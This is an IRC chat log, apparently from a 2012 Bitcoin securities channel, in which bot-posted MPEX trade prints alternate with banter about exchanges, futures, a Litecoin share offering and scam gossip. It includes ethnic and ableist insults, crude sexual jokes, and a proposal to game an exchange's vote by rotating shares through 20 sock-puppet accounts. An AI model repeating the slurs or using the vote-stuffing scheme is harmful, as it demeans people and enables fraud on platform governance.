Dec 10 21:00:35 [MPEX] [X.EWTI] 1 @ 0.06666667 BTC [-] Dec 10 21:00:36 [MPEX] [X.ENGG] 1 @ 0.27682136 BTC Dec 10 21:00:37 [MPEX] [X.EHOG] 1 @ 0.22636576 BTC Dec 10 21:00:39 [MPEX] [X.ACOG] 1 @ 0.05710061 BTC Dec 10 21:00:40 [MPEX] [X.ASBG] 1 @ 0.11396016 BTC Dec 10 21:00:40 [MPEX] [X.AWHG] 1 @ 0.0670108 BTC Dec 10 21:00:41 [MPEX] [X.ACCA] 1 @ 0.18675666 BTC Dec 10 21:00:42 [MPEX] [X.ALCG] 1 @ 0.10096628 BTC Dec 10 21:00:43 [MPEX] [X.MGCG] 1 @ 0.13219995 BTC [-] Dec 10 21:00:44 [MPEX] [X.MSIG] 1 @ 0.25711156 BTC Dec 10 21:00:45 [MPEX] [X.IEDG] 1 @ 0.07767461 BTC Dec 10 21:03:30 [MPEX] [S.MPOE] 5500 @ 0.00052796 = 2.9038 BTC [-] Dec 10 21:06:57 [MPEX] [S.MPOE] 9740 @ 0.00052796 = 5.1423 BTC [-] Dec 10 21:06:58 [MPEX] [S.MPOE] 2750 @ 0.00052574 = 1.4458 BTC [-] Dec 10 21:12:49 [MPEX] [S.MPOE] 10187 @ 0.00052302 = 5.328 BTC [-] Dec 10 21:12:50 [MPEX] [S.MPOE] 9663 @ 0.00052001 = 5.0249 BTC [-] Dec 10 21:13:36 [MPEX] [X.MGCG] 18 @ 0.13219995 = 2.3796 BTC [-] Dec 10 21:21:22 [MPEX] [S.MPOE] 13510 @ 0.00052377 = 7.0761 BTC [+] Dec 10 21:21:23 [MPEX] [S.MPOE] 28315 @ 0.00053193 = 15.0616 BTC [+] Dec 10 21:21:24 [MPEX] [S.MPOE] 19256 @ 0.00053708 = 10.342 BTC [+] Dec 10 21:21:25 [MPEX] [S.MPOE] 5800 @ 0.00053711 = 3.1152 BTC [+] Dec 10 21:21:26 [MPEX] [S.MPOE] 24900 @ 0.00053725 = 13.3775 BTC [+] Dec 10 21:21:28 [MPEX] [S.MPOE] 10000 @ 0.00053731 = 5.3731 BTC [+] Dec 10 21:21:30 [MPEX] [S.MPOE] 57250 @ 0.00053732 = 30.7616 BTC [+] Dec 10 21:21:31 [MPEX] [S.MPOE] 11700 @ 0.00053738 = 6.2873 BTC [+] Dec 10 21:21:32 [MPEX] [S.MPOE] 2588 @ 0.00053743 = 1.3909 BTC [+] Dec 10 21:21:33 [MPEX] [S.MPOE] 19500 @ 0.0005375 = 10.4813 BTC [+] Dec 10 21:21:35 [MPEX] [S.MPOE] 26600 @ 0.00053774 = 14.3039 BTC [+] Dec 10 21:21:36 [MPEX] [S.MPOE] 5600 @ 0.00053787 = 3.0121 BTC [+] Dec 10 21:21:36 [MPEX] [S.MPOE] 48742 @ 0.00053804 = 26.2251 BTC [+] Dec 10 21:21:37 [MPEX] [S.MPOE] 5300 @ 0.00053824 = 2.8527 BTC [+] Dec 10 21:21:38 [MPEX] [S.MPOE] 14950 @ 0.00053831 = 8.0477 BTC [+] Dec 10 21:21:39 [MPEX] [S.MPOE] 6405 @ 0.00053839 = 3.4484 BTC [+] Dec 10 21:21:40 [MPEX] [S.MPOE] 14702 @ 0.00053847 = 7.9166 BTC [+] Dec 10 21:21:41 [MPEX] [S.MPOE] 7700 @ 0.00053877 = 4.1485 BTC [+] Dec 10 21:21:42 [MPEX] [S.MPOE] 7182 @ 0.00053893 = 3.8706 BTC [+] Dec 10 21:27:55 [MPEX] [S.MPOE] 4321 @ 0.00053871 = 2.3278 BTC [-] Dec 10 21:27:56 [MPEX] [S.MPOE] 4321 @ 0.00053873 = 2.3279 BTC [+] Dec 10 21:27:58 [MPEX] [S.MPOE] 15858 @ 0.00053893 = 8.5464 BTC [+] Dec 10 21:45:35 [MPEX] [S.MPOE] 4321 @ 0.00053535 = 2.3132 BTC [-] Dec 10 21:45:36 [MPEX] [S.MPOE] 26479 @ 0.00053501 = 14.1665 BTC [-] Dec 10 22:15:16 [MPEX] [S.MPOE] 4321 @ 0.00053516 = 2.3124 BTC [+] Dec 10 22:15:17 [MPEX] [S.MPOE] 6410 @ 0.00053501 = 3.4294 BTC [-] Dec 10 22:18:08 [MPEX] [S.MPOE] 31850 @ 0.000535 = 17.0398 BTC [-] Dec 10 22:28:16 [MPEX] [S.MPOE] 8000 @ 0.00053882 = 4.3106 BTC [+] Dec 10 22:28:17 [MPEX] [S.MPOE] 4321 @ 0.00053883 = 2.3283 BTC [+] Dec 10 22:28:19 [MPEX] [S.MPOE] 510 @ 0.00053893 = 0.2749 BTC [+] Dec 10 22:28:20 [MPEX] [S.MPOE] 18 @ 0.000539 = 0.0097 BTC [+] Dec 10 22:30:47 [MPEX] [S.MPOE] 4321 @ 0.00053883 = 2.3283 BTC [-] Dec 10 22:30:48 [MPEX] [S.MPOE] 379 @ 0.000539 = 0.2043 BTC [+] Dec 10 22:34:15 [MPEX] [S.MPOE] 4321 @ 0.00053898 = 2.3289 BTC [-] Dec 10 22:34:16 [MPEX] [S.MPOE] 13939 @ 0.000539 = 7.5131 BTC [+] Dec 10 22:35:15 ciuciu: And to paraphrase Mircea and his friends, it is OK to look at porn, even to make it as you both do. Dec 10 22:35:22 and who is he, the holy pope? Dec 10 22:36:56 so weird this porn thing. Dec 10 22:37:50 im kinda dissapointed you left mnw on that list Dec 10 22:37:50 of yours Dec 10 22:37:56 even with the tiny sub comment Dec 10 22:38:11 its like Dec 10 22:38:11 if you have him Dec 10 22:38:15 you should add yourself! Dec 10 22:38:28 myself ?! whar did i do! Dec 10 22:38:34 drama. Dec 10 22:39:01 i did no drama, i merely used the drama already there Dec 10 22:39:03 there was plenty of it and still is bout mpex Dec 10 22:39:34 even if noone lost any coins Dec 10 22:39:35 just like with MNW Dec 10 22:39:35 yeah MNW is simmilar, pirate drama abuser Dec 10 22:39:50 you cannot write 10k coins lost or whatever Dec 10 22:40:07 just like youd write 900 lost to giga on mpex Dec 10 22:40:16 or whatever Dec 10 22:40:38 more like... 200ish i think Dec 10 22:40:51 im not trying to dunk you here just mnw does not belong there Dec 10 22:41:21 well 200 Dec 10 22:41:28 mnw scammed for less than 200 Dec 10 22:41:55 its like Dec 10 22:41:59 look, why can;t i mention mnw if i want to! Dec 10 22:43:32 meh Dec 10 22:44:09 i passed over bruce wagner! Dec 10 22:44:38 just making bitcoinland looking worse than it already it and to a newb who ready that post it will look like mnw got away with 10k or whatever Dec 10 22:44:56 fucking typos Dec 10 22:45:15 ya well, the past does look kinda wtfbleak Dec 10 22:45:20 but we survived so far... Dec 10 22:45:39 link me to the newest drama Dec 10 22:46:16 we're all out ;/ Dec 10 22:46:19 awaiting fresh supply. Dec 10 22:47:05 need more scam Dec 10 22:47:08 er milk. Dec 10 22:47:48 /invite usagi #bitcoin-assets Dec 10 22:48:01 ha Dec 10 22:48:01 http://blog.bitinstant.com/blog/2012/12/10/the-controversy-of-bankhood.html Dec 10 22:48:04 here's some Dec 10 22:48:06 attempt anyway Dec 10 22:48:10 i read that one already Dec 10 22:48:23 tldr Dec 10 22:48:44 http://www.mcx.com/ Dec 10 22:48:51 bitcoin-killer Dec 10 22:50:49 MCX’s solution may not be on the market yet, but once it is, it will quickly be accepted at a broad array of retailers processing more than $1 trillion in payments annually. No other solution can say that. Dec 10 22:50:49 rofl Dec 10 22:51:06 the scroll bit rules Dec 10 22:51:21 this is almost like reading bfl propaganda Dec 10 22:52:52 i like the participating merchants list Dec 10 22:53:33 "Here's yet another sign that bitcoin is a legit currency: A new bank for bitcoin is up and running at Bitcoin-Central.net." Dec 10 22:53:37 dude vice is fucking retarded. Dec 10 22:53:45 where do all these veggies come from ? Dec 10 23:05:04 [MPEX] [S.MPOE] 29088 @ 0.00053819 = 15.6549 BTC [-] Dec 10 23:09:09 [MPEX] [S.MPOE] 2497 @ 0.000539 = 1.3459 BTC [+] Dec 10 23:14:56 does deadterra come on irc? Dec 10 23:15:00 i swear ive seen the nick here before Dec 10 23:15:13 ;;seen deadterra Dec 10 23:15:13 deadterra was last seen in #bitcoin-assets 2 weeks, 0 days, 0 hours, 51 minutes, and 42 seconds ago: : your kidding me right... since when to I send links to viruses... Dec 10 23:15:14 why is your name ukyo ?! Dec 10 23:15:23 irc failed over to alt nick Dec 10 23:15:24 long ago Dec 10 23:15:28 someone else regd my name Dec 10 23:15:35 by the time i got ukyo registerd Dec 10 23:15:41 everyone knew ukto Dec 10 23:15:54 hahaha quiye the stoyy Dec 10 23:16:04 i am considering changing irc Dec 10 23:16:56 jurov : https://bitcointalk.org/index.php?topic=130117.0 ukto got 2fa going' Dec 10 23:17:05 BitFunder posted: https://bitcointalk.org/index.php?topic=130117.0 any supportive / positive comments welcome! :) Dec 10 23:17:13 lol Dec 10 23:17:17 mircea_popescu: on all my sites Dec 10 23:17:56 i'm halfway there with 2fa Dec 10 23:18:20 Ukto i got girls workin' fo me. Dec 10 23:18:22 in da buff. Dec 10 23:18:36 jurov so 1fa ? :D Dec 10 23:18:47 yeah like that :D Dec 10 23:19:23 mircea_popescu: well then, buff em :P Dec 10 23:19:38 jurov: if you need help, lemme know :) Dec 10 23:19:45 its fairly easy Dec 10 23:20:38 yes, already figured the hardest part and can show qr codes... but there was another work plus i got some flu again... Dec 10 23:20:53 ouch Dec 10 23:29:03 and must confess, my priority recently was rather to tune the bot... Dec 10 23:29:34 heh, I know how proirities go! :) Dec 10 23:29:46 but now i ran out of ideas how to improve it without redoing whole thing, coinbr can get some love Dec 10 23:30:46 lol Dec 10 23:31:00 btw, just to remind everyone that i'm still taking mm's for the futures. Dec 10 23:31:50 and i'm ready to equip mm's with a code... as i spammed everywhere Dec 10 23:32:21 hm? Dec 10 23:32:52 .. merged mining? :P Dec 10 23:33:15 hehe, no market makers for futures Dec 10 23:33:25 :P Dec 10 23:34:19 and my idea is, someone like that may find coinbr foundation useful Dec 10 23:34:43 a a Dec 10 23:34:46 quite possibly. Dec 10 23:39:11 [MPEX] [S.MPOE] 13267 @ 0.000539 = 7.1509 BTC [+] Dec 10 23:39:13 [MPEX] [S.MPOE] 5000 @ 0.00053916 = 2.6958 BTC [+] Dec 10 23:39:14 [MPEX] [S.MPOE] 3783 @ 0.00053939 = 2.0405 BTC [+] Dec 10 23:44:02 [MPEX] [S.MPOE] 24617 @ 0.00053939 = 13.2782 BTC [+] Dec 10 23:44:03 [MPEX] [S.MPOE] 1883 @ 0.00053991 = 1.0167 BTC [+] Dec 10 23:44:56 Ukto "This site is pretty awesome compared to others I've looked at. It has an easy and intuitive interface which makes buying and selling shares really easy." Dec 10 23:45:04 prepare for the charge of noob brigade Dec 10 23:46:12 LOL Dec 10 23:47:28 we shall see Dec 10 23:47:36 post has hardly hit 31 views Dec 10 23:47:45 dont think the post itself will cause any major uproar :P Dec 10 23:48:05 I honestly was not even going to bother Dec 10 23:48:15 a couple possible issuers asked me to Dec 10 23:48:16 bah. does it have one-click price setting like coinbr? Dec 10 23:48:31 it has one click price cancel! :P Dec 10 23:49:01 besides, usually when you enter a price, you use the keyboard, the click one time to submit Dec 10 23:49:06 so wouldnt everyone have 1 click? :P Dec 10 23:49:24 you dont HAVE to click a text box.. you can tab to it.. :P Dec 10 23:49:31 clicking is optional Dec 10 23:49:43 so BF is NO-Click price setting :P Dec 10 23:51:32 o wow i'm inspired Dec 10 23:51:46 lol Dec 10 23:53:23 mircea, you should replace whole mpex page with blank screen & command prompt Dec 10 23:53:32 wow Dec 10 23:53:35 that would just... wow. Dec 10 23:53:35 C:\> Dec 10 23:55:14 Abort, Retry, Fail? Dec 10 23:55:25 be like Dec 10 23:55:31 mpex$_ Dec 10 23:55:55 lol Dec 10 23:57:21 http://duckduckgo.com/tty/ Dec 10 23:57:45 :] Dec 11 00:01:49 pff already done Dec 11 00:07:07 [MPEX] [S.DICE] 850 @ 0.00331325 = 2.8163 BTC [-] Dec 11 00:07:08 [MPEX] [S.DICE] 589 @ 0.0033 = 1.9437 BTC [-] Dec 11 00:08:20 davout don't worry, the current set of groupies will be soon replaced by a larger, worse one. Dec 11 00:08:31 =O Dec 11 00:08:35 Futures Dec 11 00:10:38 mircea_popescu: asshole :D Dec 11 00:10:40 Hmm, 2% fee Dec 11 00:10:51 2% free? :P Dec 11 00:10:58 mircea_popescu: btw i haven't rated you on otc yet, but i will Dec 11 00:11:11 is that a threat? :P Dec 11 00:11:12 Those thing don't move as much in value. The 2% fee might get annoying. Dec 11 00:16:21 Namjies but bitcoin moves Dec 11 00:16:24 Namjies true. Dec 11 00:16:47 then again you can just buy them Dec 11 00:17:01 indeed Dec 11 00:17:06 2% fee for what? Dec 11 00:17:19 pigeons http://trilema.com/2012/futures-on-mpex/ Dec 11 00:17:23 I'd probably sell them to go long on Bitcoins. Dec 11 00:17:27 also davout's mom Dec 11 00:17:48 davout's mom is a bank Dec 11 00:17:54 no that's his other mom Dec 11 00:18:03 "The future is here with futures"... or some marketing of the sort. Dec 11 00:18:18 come on guys Dec 11 00:18:22 don't be so jealous Dec 11 00:18:32 you WISH you were regulated as I am :3 Dec 11 00:18:35 Namjies yeah, selling them would be a decent synthetic btc buy Dec 11 00:19:11 https://dl.dropbox.com/u/52452135/io.jpg Dec 11 00:19:19 ahaha in romanian regulated is argot for http://polimedia.us/dtng/c/thumb/13370513351s.gif Dec 11 00:19:49 who's that gypsy douche you're so infatuated with anyway ? Dec 11 00:20:06 he's my own personal god Dec 11 00:20:31 he's called django reinhardt Dec 11 00:20:37 are you allowed in bitcoin if your personal god isn't galt ? Dec 11 00:21:07 http://www.youtube.com/watch?v=LoIJ4W7kXiQ actually i've heard worse Dec 11 00:21:09 and i use it as my avatar and public face because it looks slightly more professionnal than spongebob squarepants Dec 11 00:21:36 this guy is awesome to listen to Dec 11 00:21:41 and he's awesome to play Dec 11 00:21:49 not that i'd ever play like him Dec 11 00:21:52 but still Dec 11 00:21:57 and the best part Dec 11 00:22:01 i like guys who are aware that they look like spongebob irl. Dec 11 00:22:24 is that this guy has lost TWO FUCKING FINGERS ON HIS LEFT HAND Dec 11 00:22:32 before he even got this guitar style Dec 11 00:22:48 spongebob is awesome Dec 11 00:23:26 "a familiar rock awaits you somewhere" -> oh god, i didn't understand this one right away, but when i did it fucking cracked me up Dec 11 00:23:36 what's that ? Dec 11 00:24:16 MPOE-PR being the usual bitch :) Dec 11 00:24:26 [MPEX] [S.MPOE] 4321 @ 0.0005386 = 2.3273 BTC [-] Dec 11 00:24:27 [MPEX] [S.MPOE] 4050 @ 0.00053845 = 2.1807 BTC [-] Dec 11 00:24:29 [MPEX] [S.MPOE] 6729 @ 0.00053818 = 3.6214 BTC [-] Dec 11 00:24:33 lol Dec 11 00:24:40 she could bottle it and sell it. 99 9/8 pure. Dec 11 00:25:25 i still haven't decided if you are actually different people of if she's just your other personality Dec 11 00:25:35 but i don't think it really mattes Dec 11 00:25:39 matters* Dec 11 00:25:44 same person Dec 11 00:26:34 c la pire PR que je peux imaginer Dec 11 00:26:48 but i like it Dec 11 00:26:52 J'approuve Dec 11 00:26:52 i think at least he really puts on women's panties when he gets into the role Dec 11 00:26:53 worst and best collide lyspooner :D Dec 11 00:26:56 [MPEX] [S.MPOE] 4321 @ 0.00053982 = 2.3326 BTC [+] Dec 11 00:26:58 [MPEX] [S.MPOE] 4726 @ 0.00053996 = 2.5519 BTC [+] Dec 11 00:27:17 and she actually is a she. Dec 11 00:27:17 yet another drugs&porn bitcoin "advocate": http://www.digitaltrends.com/cool-tech/the-future-of-money-its-not-in-your-hands/ Dec 11 00:27:56 jurov possibly the worst touch-up job on that pic. is it supposed to be half "digital" that 1 dolalr note ? Dec 11 00:28:20 mircea_popescu: timestamped picture or she lives in your brain Dec 11 00:28:41 how did that go Dec 11 00:28:53 ;;google poliboobs Dec 11 00:28:54 PoliTits: ; poliboobs - Twitter: ; PoliTITS | wherethegirlsgo: Dec 11 00:29:22 i need a break from the forums Dec 11 00:31:40 davout, so you came here? Dec 11 00:32:02 well Dec 11 00:32:08 i had to go *somewhere* Dec 11 00:32:18 and i didn't really feel like meditation Dec 11 00:32:27 whats wrong with here jurov? Dec 11 00:32:34 oh this, and mircea summoned me Dec 11 00:32:52 nothing wrong, just poking a bit Dec 11 00:33:34 [MPEX] [X.MGCG] 112 @ 0.13219995 = 14.8064 BTC [-] Dec 11 00:34:06 gold is totally the winner so far Dec 11 00:35:31 did you ask coinabul on physical delivery at least for that? Dec 11 00:35:56 we discussed it many months ago. Dec 11 00:36:12 and ? Dec 11 00:36:44 [MPEX] [X.EWTI] 60 @ 0.06666667 = 4 BTC [-] Dec 11 00:37:07 [MPEX] [S.MPOE] 6610 @ 0.00053996 = 3.5691 BTC [+] Dec 11 00:37:18 like, what did they say? Dec 11 00:37:52 complicated. Dec 11 00:38:27 [MPEX] [S.MPOE] 27514 @ 0.00053996 = 14.8565 BTC [+] Dec 11 00:38:28 [MPEX] [S.MPOE] 18800 @ 0.00054001 = 10.1522 BTC [+] Dec 11 00:38:30 [MPEX] [S.MPOE] 14628 @ 0.00054002 = 7.8994 BTC [+] Dec 11 00:38:31 [MPEX] [S.MPOE] 11736 @ 0.00054005 = 6.338 BTC [+] Dec 11 00:38:32 [MPEX] [S.MPOE] 38100 @ 0.00054006 = 20.5763 BTC [+] Dec 11 00:38:32 [MPEX] [S.MPOE] 4100 @ 0.00054012 = 2.2145 BTC [+] Dec 11 00:38:33 [MPEX] [S.MPOE] 29894 @ 0.00054039 = 16.1544 BTC [+] Dec 11 00:38:35 [MPEX] [S.MPOE] 12400 @ 0.00054056 = 6.7029 BTC [+] Dec 11 00:38:36 [MPEX] [S.MPOE] 2828 @ 0.00054064 = 1.5289 BTC [+] Dec 11 00:40:43 [MPEX] [S.MPOE] 3622 @ 0.00054064 = 1.9582 BTC [+] Dec 11 00:40:44 [MPEX] [S.MPOE] 8078 @ 0.00054074 = 4.3681 BTC [+] Dec 11 00:43:01 [MPEX] [S.MPOE] 4321 @ 0.00053848 = 2.3268 BTC [-] Dec 11 00:43:02 [MPEX] [S.MPOE] 11879 @ 0.00053818 = 6.393 BTC [-] Dec 11 00:45:15 [MPEX] [S.MPOE] 4321 @ 0.00053827 = 2.3259 BTC [+] Dec 11 00:45:16 [MPEX] [S.MPOE] 1579 @ 0.00053818 = 0.8498 BTC [-] Dec 11 00:50:11 [MPEX] [S.MPOE] 3479 @ 0.000538 = 1.8717 BTC [-] Dec 11 00:54:24 [MPEX] [S.MPOE] 4321 @ 0.00054048 = 2.3354 BTC [+] Dec 11 00:54:26 [MPEX] [S.MPOE] 13372 @ 0.00054074 = 7.2308 BTC [+] Dec 11 00:56:32 [MPEX] [S.MPOE] 4321 @ 0.00054052 = 2.3356 BTC [-] Dec 11 00:56:33 [MPEX] [S.MPOE] 31350 @ 0.00054074 = 16.9522 BTC [+] Dec 11 00:56:35 [MPEX] [S.MPOE] 23500 @ 0.00054098 = 12.713 BTC [+] Dec 11 00:56:36 [MPEX] [S.MPOE] 14850 @ 0.0005411 = 8.0353 BTC [+] Dec 11 00:56:37 [MPEX] [S.MPOE] 12712 @ 0.00054132 = 6.8813 BTC [+] Dec 11 00:56:38 [MPEX] [S.MPOE] 4450 @ 0.00054134 = 2.409 BTC [+] Dec 11 00:56:39 [MPEX] [S.MPOE] 17251 @ 0.00054139 = 9.3395 BTC [+] Dec 11 00:56:41 [MPEX] [S.MPOE] 27950 @ 0.00054142 = 15.1327 BTC [+] Dec 11 00:56:42 [MPEX] [S.MPOE] 24800 @ 0.00054177 = 13.4359 BTC [+] Dec 11 00:56:43 [MPEX] [S.MPOE] 8639 @ 0.00054205 = 4.6828 BTC [+] Dec 11 00:56:43 [MPEX] [S.MPOE] 10500 @ 0.00054211 = 5.6922 BTC [+] Dec 11 00:56:44 [MPEX] [S.MPOE] 9000 @ 0.00054222 = 4.88 BTC [+] Dec 11 00:56:45 [MPEX] [S.MPOE] 22700 @ 0.00054226 = 12.3093 BTC [+] Dec 11 00:56:46 [MPEX] [S.MPOE] 16650 @ 0.00054236 = 9.0303 BTC [+] Dec 11 00:56:47 [MPEX] [S.MPOE] 9900 @ 0.00054249 = 5.3707 BTC [+] Dec 11 00:56:48 [MPEX] [S.MPOE] 9050 @ 0.00054251 = 4.9097 BTC [+] Dec 11 00:56:49 [MPEX] [S.MPOE] 16600 @ 0.00054253 = 9.006 BTC [+] Dec 11 00:56:51 [MPEX] [S.MPOE] 16850 @ 0.00054267 = 9.144 BTC [+] Dec 11 00:56:52 [MPEX] [S.MPOE] 8400 @ 0.00054284 = 4.5599 BTC [+] Dec 11 00:56:53 [MPEX] [S.MPOE] 21506 @ 0.00054296 = 11.6769 BTC [+] Dec 11 00:56:53 [MPEX] [S.MPOE] 21050 @ 0.00054306 = 11.4314 BTC [+] Dec 11 00:56:54 [MPEX] [S.MPOE] 17900 @ 0.00054313 = 9.722 BTC [+] Dec 11 00:56:55 [MPEX] [S.MPOE] 12532 @ 0.00054313 = 6.8065 BTC [+] Dec 11 00:56:56 [MPEX] [S.MPOE] 24264 @ 0.00054328 = 13.1821 BTC [+] Dec 11 00:56:57 [MPEX] [S.MPOE] 45350 @ 0.00054331 = 24.6391 BTC [+] Dec 11 00:56:58 [MPEX] [S.MPOE] 15000 @ 0.00054332 = 8.1498 BTC [+] Dec 11 00:56:59 [MPEX] [S.MPOE] 19520 @ 0.00054333 = 10.6058 BTC [+] Dec 11 00:57:00 [MPEX] [S.MPOE] 13350 @ 0.00054333 = 7.2535 BTC [+] Dec 11 00:57:01 [MPEX] [S.MPOE] 25800 @ 0.0005435 = 14.0223 BTC [+] Dec 11 00:57:02 [MPEX] [S.MPOE] 13200 @ 0.00054357 = 7.1751 BTC [+] Dec 11 00:57:03 [MPEX] [S.MPOE] 18100 @ 0.0005436 = 9.8392 BTC [+] Dec 11 00:57:03 [MPEX] [S.MPOE] 28100 @ 0.0005436 = 15.2752 BTC [+] Dec 11 00:57:04 [MPEX] [S.MPOE] 17850 @ 0.00054378 = 9.7065 BTC [+] Dec 11 00:57:05 [MPEX] [S.MPOE] 27212 @ 0.00054402 = 14.8039 BTC [+] Dec 11 00:57:06 [MPEX] [S.MPOE] 18500 @ 0.00054437 = 10.0708 BTC [+] Dec 11 00:57:08 [MPEX] [S.MPOE] 12900 @ 0.00054438 = 7.0225 BTC [+] Dec 11 00:57:09 [MPEX] [S.MPOE] 23000 @ 0.00054453 = 12.5242 BTC [+] Dec 11 00:57:10 [MPEX] [S.MPOE] 28750 @ 0.00054526 = 15.6762 BTC [+] Dec 11 00:57:11 [MPEX] [S.MPOE] 8300 @ 0.00054558 = 4.5283 BTC [+] Dec 11 00:57:12 [MPEX] [S.MPOE] 26600 @ 0.00054571 = 14.5159 BTC [+] Dec 11 00:57:13 [MPEX] [S.MPOE] 33902 @ 0.0005458 = 18.5037 BTC [+] Dec 11 00:57:13 [MPEX] [S.MPOE] 35800 @ 0.00054593 = 19.5443 BTC [+] Dec 11 00:57:14 [MPEX] [S.MPOE] 20500 @ 0.00054615 = 11.1961 BTC [+] Dec 11 00:57:15 [MPEX] [S.MPOE] 15000 @ 0.0005463 = 8.1945 BTC [+] Dec 11 00:57:16 [MPEX] [S.MPOE] 20200 @ 0.00054774 = 11.0643 BTC [+] Dec 11 00:57:17 [MPEX] [S.MPOE] 66300 @ 0.00054782 = 36.3205 BTC [+] Dec 11 00:57:18 [MPEX] [S.MPOE] 25167 @ 0.00054807 = 13.7933 BTC [+] Dec 11 00:57:19 [MPEX] [S.MPOE] 13033 @ 0.00054826 = 7.1455 BTC [+] Dec 11 00:57:20 [MPEX] [S.MPOE] 11950 @ 0.00054854 = 6.5551 BTC [+] Dec 11 00:57:21 [MPEX] [S.MPOE] 73350 @ 0.00054887 = 40.2596 BTC [+] Dec 11 00:57:22 [MPEX] [S.MPOE] 48750 @ 0.00054905 = 26.7662 BTC [+] Dec 11 00:59:41 she says o wtf happened here! Dec 11 00:59:48 heh. Dec 11 01:00:04 anyway, mpoe-pr says "he puts on women's panties, and posts on bitcointaaaaalk" Dec 11 01:00:16 who, u? :P Dec 11 01:00:33 no srsly guise Dec 11 01:00:40 havent seen u post on there in a while Dec 11 01:00:48 at least int he threads i read Dec 11 01:01:15 she's only really supposed to do the trading/economy Dec 11 01:03:16 i want to see you in women's panties mircea Dec 11 01:03:56 anyone has any theory as to why hash rate isn't dropping ? Dec 11 01:04:38 it is dropping Dec 11 01:05:16 ;;bc,diffchange Dec 11 01:05:17 Estimated percent change in difficulty this period | -6.67681208754 % based on data since last change | -5.57782548461 % based on data for last three days Dec 11 01:06:02 3.3mn diff... Dec 11 01:06:13 24.9 th/s Dec 11 01:06:16 hardly a drop! Dec 11 01:06:36 https://www.litecoinglobal.com/security/MOB#tab3 Dec 11 01:06:43 looks like a winner Dec 11 01:06:49 people are simply speculating that the future value will make them profitable retroactively Dec 11 01:08:41 why's that thing still loading ;/ Dec 11 01:09:17 i was trying to link to the contract & prospectus page Dec 11 01:10:25 [MPEX] [S.MPOE] 20600 @ 0.00055037 = 11.3376 BTC [+] Dec 11 01:10:26 [MPEX] [S.MPOE] 20300 @ 0.00055101 = 11.1855 BTC [+] Dec 11 01:14:19 [MPEX] [S.MPOE] 11711 @ 0.00055 = 6.4411 BTC [-] Dec 11 01:14:59 25000 Shares Will Be Issued With An Approx. Value Of 1.0 LTC Per Share. Dec 11 01:14:59 Funds raised will be invested into various loans including but not limited to Dec 11 01:14:59 BTCJAM.com Dec 11 01:15:03 hmmm Dec 11 01:15:03 what could possibly go right. Dec 11 01:15:22 In the extremely unlikely event that we operate at a loss for more than 90 days, Dec 11 01:15:22 the board reserves the option to Dec 11 01:15:23 :D Dec 11 01:15:26 think i shoulda posted the bitfunder thread in teh main marktplace instead of securities? :/ Dec 11 01:15:43 securities seems apropriate Dec 11 01:15:55 it, itself isnt a security Dec 11 01:16:08 cryptostocks lists in the main marketplace Dec 11 01:16:16 note: we are not really the mob Dec 11 01:16:18 C) SHAREHOLDERS as OWNERS of a public company are OBLIGATED to act IN GOOD FAITH with regard to the company and its operation, including GUARDING TRADE SECRETS Dec 11 01:16:36 what if they break C ? Dec 11 01:16:37 this is pretty good. guard them trade secrets of the 25k share 1 ltc nominal non-mob mob thingee Dec 11 01:17:05 they probably trade $15 to suzy for massage services, which is their trade secret. Dec 11 01:17:24 bet you wish you were more user friendly now Dec 11 01:17:33 what's the ltc in btc these days ? Dec 11 01:17:33 lol Dec 11 01:17:37 i thnk hes glad hes not Dec 11 01:17:41 0.06 i think Dec 11 01:17:44 or 0.05999 Dec 11 01:17:54 Ukto i was starting to be concerned i'm a little TOO friendly Dec 11 01:18:00 need to hire -pr's identical twin. Dec 11 01:18:02 LTC/BTC 0.00596 Dec 11 01:18:04 imagine, two of those. Dec 11 01:18:13 ;;calc 25000 * 0.00596 Dec 11 01:18:14 149 Dec 11 01:18:14 mircea_popescu: just swich the site to the console system :P Dec 11 01:18:27 o hey! the entire corp is less than what i made playing dragon's tale for a coupla days Dec 11 01:18:39 shit. Dec 11 01:18:44 did i just give out a trade secret ? Dec 11 01:18:54 is dragons tale full of ads? Dec 11 01:18:56 :P Dec 11 01:18:59 notrly Dec 11 01:19:06 mostly full of coconuts Dec 11 01:19:25 D) The litecoinglobal.com website operates as a non-fiduciary clearinghouse Dec 11 01:19:25 providing transactional intermediation between private parties Dec 11 01:19:33 what the fuck does this mean ? Dec 11 01:20:13 it means they trade cocunuts Dec 11 01:20:43 wait a second. any user owning 10 shares in the exchange gets to vote on new issues ? Dec 11 01:21:09 yea Dec 11 01:21:11 buy 10 Dec 11 01:21:11 suppose i make 20 accounts, buy 10 shares and round-robin them around. = 20 votes => your momma's a whore inc (YMAH, inc) approved Dec 11 01:21:14 and you can vote how you want Dec 11 01:21:19 yes Dec 11 01:21:23 da fuck ?! Dec 11 01:21:26 who came up with this Dec 11 01:21:31 do that Dec 11 01:21:33 and vote no Dec 11 01:21:34 for everything Dec 11 01:21:39 lmao that too Dec 11 01:21:42 total dos. Dec 11 01:21:50 no counts as 2 negative votes Dec 11 01:21:54 yes counts as 1 positive Dec 11 01:28:31 [MPEX] [S.MPOE] 5900 @ 0.00055 = 3.245 BTC [-] Dec 11 01:31:54 [MPEX] [S.MPOE] 3109 @ 0.00055101 = 1.7131 BTC [+] Dec 11 01:38:58 [MPEX] [S.DICE] 650 @ 0.00329871 = 2.1442 BTC [-] Dec 11 01:39:54 davout what is an assymmetric cypher? Dec 11 01:39:55 zing! Dec 11 01:40:49 you see, that's the problem with success Dec 11 01:41:09 one spelling mistake gets amplified by all the wannabe legitimate regulated businessmen Dec 11 01:41:13 :3 Dec 11 01:41:55 ahahaha Dec 11 01:42:05 you mean, of course, bussinessmen Dec 11 01:47:43 stop being so jealous mircea, one day you'll be regulated too Dec 11 01:48:33 [MPEX] [S.MPOE] 3454 @ 0.00055007 = 1.8999 BTC [-] Dec 11 01:49:31 [MPEX] [S.MPOE] 6747 @ 0.00055101 = 3.7177 BTC [+] Dec 11 01:49:32 [MPEX] [S.MPOE] 1753 @ 0.00055154 = 0.9668 BTC [+] Dec 11 01:50:14 speaking of regulating, i should probably create some way for btc people to short euro and us financial institutions Dec 11 01:50:19 that'll be a doozy Dec 11 01:56:26 [MPEX] [S.MPOE] 867 @ 0.00055007 = 0.4769 BTC [-] Dec 11 01:56:28 [MPEX] [S.MPOE] 20783 @ 0.00055 = 11.4307 BTC [-] Dec 11 01:58:55 [MPEX] [S.MPOE] 28795 @ 0.00055 = 15.8373 BTC [-] Dec 11 02:06:00 who sets up these s.mpoe manipulations? Dec 11 02:08:28 right after i sell it to repay a loan, someone pushes price up and puts a wall on 0.00055 Dec 11 02:10:17 [MPEX] [S.DICE] 869 @ 0.00329871 = 2.8666 BTC [-] Dec 